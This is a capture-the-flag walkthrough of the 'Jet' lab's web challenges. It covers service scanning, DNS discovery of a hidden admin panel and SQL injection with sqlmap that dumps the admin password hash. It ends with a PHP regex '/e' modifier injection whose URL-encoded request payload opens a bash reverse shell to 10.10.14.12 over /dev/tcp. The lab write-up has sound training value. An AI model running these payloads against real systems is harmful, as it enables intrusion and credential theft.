Jet

I'll only cover the web challenges and leave all the reversing and crypto challenges up to the you :)

Initial Enumeration

Rustscan

sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.13.37.10 -- -sV -sC -oA ./{{ip}}

Ports

Open 10.13.37.10:22
Open 10.13.37.10:53
Open 10.13.37.10:80
Open 10.13.37.10:5555
Open 10.13.37.10:7777
Open 10.13.37.10:8082
Open 10.13.37.10:8081
Open 10.13.37.10:8083
Open 10.13.37.10:9201

Services

PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain   syn-ack ttl 63 ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http     syn-ack ttl 63 nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx on Debian!
| http-methods: 
|_  Supported Methods: GET HEAD
5555/tcp open  freeciv? syn-ack ttl 63
| fingerprint-strings: 
|_  DNSVersionBindReqTCP, GenericLines, GetRequest, adbConnect: 
7777/tcp open  cbt?     syn-ack ttl 63
| fingerprint-strings: 
|_  Arucer, DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, Socks5, X11Probe: 
8081/tcp open  http     syn-ack ttl 63 PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8082/tcp open  http     syn-ack ttl 63 PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8083/tcp open  http     syn-ack ttl 63 PHP cli server 5.5 or later
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
9201/tcp open  http     syn-ack ttl 63 BaseHTTPServer 0.3 (Python 2.7.12)
|_http-server-header: BaseHTTP/0.3 Python/2.7.12
| http-methods: 
|_  Supported Methods: GET
|_http-title: Site doesn't have a title (application/json).

Connect

Checking the Webpage on Port 80 will reveal the first flag!

curl -i http://10.13.37.10/

HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 10 Mar 2023 14:11:16 GMT
Content-Type: text/html
Content-Length: 891
Last-Modified: Fri, 22 Dec 2017 09:18:31 GMT
Connection: keep-alive
ETag: "5a3ccde7-37b"
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx on Debian!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx on Debian!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working on Debian. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a></p>

<p>
      Please use the <tt>reportbug</tt> tool to report bugs in the
      nginx package with Debian. However, check <a
      href="http://bugs.debian.org/cgi-bin/pkgreport.cgi?ordering=normal;archive=0;src=nginx;repeatmerged=0">existing
      bug reports</a> before reporting a new bug.
</p>

<p><em>Thank you for using debian and nginx.</em></p>
<b>JET{CENSORED}</b>

</body>
</html>

Digging in...

The next flag will be presented to us on a new webpage we have yet to discover as nothing else can be found on the ports presented to us at the moment.

DNS Enumeration

It's always worth a shot to check if you are able to perform zone transfers or anything related to DNS. In this case using a reverse lookup I was able to get some domain names.

dig -x 10.13.37.10 @10.13.37.10

;; AUTHORITY SECTION:
37.13.10.in-addr.arpa.  604800  IN      SOA     www.securewebinc.jet. securewebinc.jet. 3 604800 86400 2419200 604800

Flag

curl -i http://www.securewebinc.jet

HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 10 Mar 2023 14:23:19 GMT
Content-Type: text/html
Content-Length: 8855
Last-Modified: Tue, 14 Nov 2017 14:07:30 GMT
Connection: keep-alive
ETag: "5a0af8a2-2297"
Accept-Ranges: bytes

...
    <section id="contact">
      <div class="container">
        <div class="row">
          <div class="col-lg-8 mx-auto text-center">
            <h2 class="section-heading">Let's Get In Touch!</h2>
            <hr class="my-4">
            <p class="mb-5">Ready to start your next project with us? That's great! Give us a call and we will get back to you as soon as possible!</p>
          </div>
        </div>
        <div class="row">
          <div class="col-lg-4 ml-auto text-center">
            <i class="fa fa-phone fa-3x mb-3 sr-contact"></i>
            <p>123-456-6789</p>
          </div>
          <div class="col-lg-4 mr-auto text-center">
            <i class="fa fa-flag-checkered fa-3x mb-3 sr-contact"></i>
            <p>JET{CENSORED}</p>
          </div>
        </div>
      </div>
    </section>
...

Going Deeper

Nice flag to be honest. We have to dig deeper on the page we just discovered to find a new application!

Enumeration

I used feroxbuster to enumerate directories and files on the page

feroxbuster -u http://www.securewebinc.jet/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -k -B -x "txt,html,php,zip,rar,tar.gz" -v -e -o ./ferox.txt

One result stood out to me as it seemed to be odd

http://www.securewebinc.jet/js/secure.js

I visited the page and can see that it's some "encrypted" code

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,83,116,97,116,115,40,41,10,123,10,32,32,32,32,36,46,97,106,97,120,40,123,117,114,108,58,32,34,47,100,105,114,98,95,115,97,102,101,95,100,105,114,95,114,102,57,69,109,99,69,73,120,47,97,100,109,105,110,47,115,116,97,116,115,46,112,104,112,34,44,10,10,32,32,32,32,32,32,32,32,115,117,99,99,101,115,115,58,32,102,117,110,99,116,105,111,110,40,114,101,115,117,108,116,41,123,10,32,32,32,32,32,32,32,32,36,40,39,35,97,116,116,97,99,107,115,39,41,46,104,116,109,108,40,114,101,115,117,108,116,41,10,32,32,32,32,125,44,10,32,32,32,32,101,114,114,111,114,58,32,102,117,110,99,116,105,111,110,40,114,101,115,117,108,116,41,123,10,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,114,101,115,117,108,116,41,59,10,32,32,32,32,125,125,41,59,10,125,10,103,101,116,83,116,97,116,115,40,41,59,10,115,101,116,73,110,116,101,114,118,97,108,40,102,117,110,99,116,105,111,110,40,41,123,32,103,101,116,83,116,97,116,115,40,41,59,32,125,44,32,49,48,48,48,48,41,59));

After decryption it looks like this

> "function getStats() { $.ajax({url: "/dirb_safe_dir_rf9EmcEIx/admin/stats.php", success: function(result){ $('#attacks').html(result) }, error: function(result){ console.log(result); }}); } getStats(); setInterval(function(){ getStats(); }, 10000);"

Flag

The flag can be found when checking the login page of the newly discovered monitoring application

curl -i http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/login.php

HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 10 Mar 2023 14:36:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=o8bm091ru1hgir2lth0dhgaj33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

...
    <!-- JET{CENSORED} -->
    <form action="/dirb_safe_dir_rf9EmcEIx/admin/dologin.php" method="post">
      <div class="form-group has-feedback">
        <input name="username" type="username" class="form-control" placeholder="Username">
        <span class="glyphicon glyphicon-envelope form-control-feedback"></span>
      </div>
      <div class="form-group has-feedback">
        <input name="password" type="password" class="form-control" placeholder="Password">
        <span class="glyphicon glyphicon-lock form-control-feedback"></span>
      </div>
      <div class="row">
        <div class="col-xs-8">
          <div class="checkbox icheck">
            <label>
              <input type="checkbox"> Remember Me
            </label>
          </div>
        </div>
        <!-- /.col -->
        <div class="col-xs-4">
          <button type="submit" class="btn btn-primary btn-block btn-flat">Sign In</button>
        </div>
        <!-- /.col -->
      </div>
    </form>
...

Bypassing Authentication

After discovering the login page I tried the usual enumeration and finally discovered that the username parameter was vulnerable to SQL Injection

Enumeration

First I tried to login as "admin:admin" which resulted in a message like

Wrong password for user admin

Second I tried "test:test" which gave me following response

Unknown user

Now I used ' or 1 or ' without a password and got this response

Wrong password for user admin

Exploitation

I'm lazy when it comes down to SQL Injections so I used sqlmap for this task with a request I captured in burp

sqlmap -r req.req -D jetadmin -T users --dump --batch

[15:59:20] [INFO] fetching columns for table 'users' in database 'jetadmin'
[15:59:20] [INFO] resumed: 'id'
[15:59:20] [INFO] resumed: 'int(11)'
[15:59:20] [INFO] resumed: 'username'
[15:59:20] [INFO] resumed: 'varchar(50)'
[15:59:20] [INFO] resumed: 'password'
[15:59:20] [INFO] resumed: 'varchar(191)'
[15:59:20] [INFO] fetching entries for table 'users' in database 'jetadmin'
[15:59:20] [INFO] retrieved: '1'
[15:59:20] [INFO] retrieved: 'CENSORED'
[15:59:20] [INFO] retrieved: 'admin'
[15:59:20] [INFO] recognized possible password hashes in column 'password'

Once the MD5 hash was discovered I was able crack it using crackstation.net

Flag

The flag can be found directly after logging in in the chat section

Command

Enumeration

There's not a lot to discover on the dashboard itself. Only thing that seems to work is the "Quick Email" widget

After going through the whole process of sending an E-Mail I checked burp to see what's happening

POST /dirb_safe_dir_rf9EmcEIx/admin/email.php HTTP/1.1
Host: www.securewebinc.jet
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 327
Origin: http://www.securewebinc.jet
Connection: close
Referer: http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dashboard.php
Cookie: PHPSESSID=4gufjvu2ksv504vi9gocptl5d6
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf

swearwords%5B%2Ffuck%2Fi%5D=make+love&swearwords%5B%2Fshit%2Fi%5D=poop&swearwords%5B%2Fass%2Fi%5D=behind&swearwords%5B%2Fdick%2Fi%5D=penis&swearwords%5B%2Fwhore%2Fi%5D=escort&swearwords%5B%2Fasshole%2Fi%5D=bad+person&to=test%40local.com&subject=Test&message=%3Cp%3Edick%3C%2Fp%3E%3Cp%3Ebitch%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1

The page also states that a "word filtering" is active to filter out bad words. When we decode the parameters it's clear that some form of php regex is used to replace those words

# Dick will get replaced by penis
# And we have control over the modifier!
swearwords[/dick/i]=penis

Exploitation

My final "exploit" looked like this and resulted in a reverse shell As stated before I have control over the modifier so I can switch from "i" to "e" which means that my supplied input will be interpreted as code

POST /dirb_safe_dir_rf9EmcEIx/admin/email.php HTTP/1.1
Host: www.securewebinc.jet
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 512
Origin: http://www.securewebinc.jet
Connection: close
Referer: http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dashboard.php
Cookie: PHPSESSID=4gufjvu2ksv504vi9gocptl5d6
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf

swearwords%5B%2Ffuck%2Fi%5D=make+love&swearwords%5B%2Fshit%2Fi%5D=poop&swearwords%5B%2Fass%2Fi%5D=behind&swearwords%5B%2Fdick%2Fe%5D=%73%79%73%74%65%6d%28%18%27%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%31%32%2f%35%33%20%30%3e%26%31%22%27%19%29%3b&swearwords%5B%2Fwhore%2Fi%5D=escort&swearwords%5B%2Fasshole%2Fi%5D=bad+person&to=test%40local.com&subject=Test&message=%3Cp%3Edick%3C%2Fp%3E%3Cp%3Ebitch%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1

Flag

After getting a shell as www-data the flag can be found in the directory of the dashboard in a file called a_flag_is_here.txt

Last updated 2 years ago